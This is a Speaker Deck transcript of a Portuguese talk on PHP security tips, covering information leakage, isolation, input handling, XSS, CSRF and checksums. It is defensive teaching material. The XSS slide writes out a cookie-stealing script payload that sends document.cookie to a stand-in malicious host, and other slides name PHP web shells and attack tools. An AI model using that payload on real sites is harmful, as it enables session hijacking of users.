Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Dicas de segurança para o PHP e seus amigos
Search
Joubert RedRat
November 18, 2016
Technology
0
32
Dicas de segurança para o PHP e seus amigos
Joubert RedRat
November 18, 2016
Tweet
Share
More Decks by Joubert RedRat
See All by Joubert RedRat
Programação defensiva com PHP
joubertredrat
0
25
Testes de integração com Testcontainers
joubertredrat
0
36
Retome o controle do seu analytics com Matomo
joubertredrat
0
35
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
38
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
37
O poder do Object Calisthenics no PHP
joubertredrat
0
140
Playing with Docker and Docker Compose
joubertredrat
0
150
Why migrate your application to microservices?
joubertredrat
0
30
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
29
Other Decks in Technology
See All in Technology
2025-12-27 Claude CodeでPRレビュー対応を効率化する@機械学習社会実装勉強会第54回
nakamasato
4
1.4k
20251225_たのしい出張報告&IgniteRecap!
ponponmikankan
0
110
Introduction to Sansan for Engineers / エンジニア向け会社紹介
sansan33
PRO
5
60k
Everything As Code
yosuke_ai
0
500
AI駆動開発ライフサイクル(AI-DLC)の始め方
ryansbcho79
0
310
AI時代のアジャイルチームを目指して ー スクラムというコンフォートゾーンからの脱却 ー / Toward Agile Teams in the Age of AI
takaking22
11
5.6k
Claude Codeを使った情報整理術
knishioka
20
12k
プロンプトエンジニアリングを超えて:自由と統制のあいだでつくる Platform × Context Engineering
yuriemori
0
340
マーケットプレイス版Oracle WebCenter Content For OCI
oracle4engineer
PRO
5
1.5k
技術選定、下から見るか?横から見るか?
masakiokuda
0
190
モノタロウ x クリエーションラインで実現する チームトポロジーにおける プラットフォームチーム・ ストリームアラインドチームの 効果的なコラボレーション
creationline
0
610
AI with TiDD
shiraji
1
350
Featured
See All Featured
The B2B funnel & how to create a winning content strategy
katarinadahlin
PRO
0
230
Abbi's Birthday
coloredviolet
0
4.2k
Reality Check: Gamification 10 Years Later
codingconduct
0
2k
The Curse of the Amulet
leimatthew05
0
6.9k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
162
16k
Optimising Largest Contentful Paint
csswizardry
37
3.6k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
35
3.3k
Building Adaptive Systems
keathley
44
2.9k
What the history of the web can teach us about the future of AI
inesmontani
PRO
0
390
Product Roadmaps are Hard
iamctodd
PRO
55
12k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
34
2.6k
The Mindset for Success: Future Career Progression
greggifford
PRO
0
210
Transcript
Dicas de segurança para o PHP e seus amigos BHACK
2016 – SEGURANÇA TI CONHECIMENTO
Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no
meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos INFORMAÇÃO
É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos 1ª
DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 3ª
DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos 4ª
DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 4ª
DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja
Dicas de segurança para o PHP e seus amigos 6ª
DICA EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 7ª
DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos 8ª
DICA CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 8ª
DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 9ª
DICA USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos 9ª
DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos ACABOU
AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM
joubertredrat
nakamasato
ponponmikankan
sansan33
yosuke_ai
ryansbcho79
takaking22
knishioka
yuriemori
oracle4engineer
masakiokuda
creationline
shiraji
katarinadahlin
coloredviolet
codingconduct
leimatthew05
sstephenson
csswizardry
rmw
keathley
inesmontani
iamctodd
jcasabona
greggifford
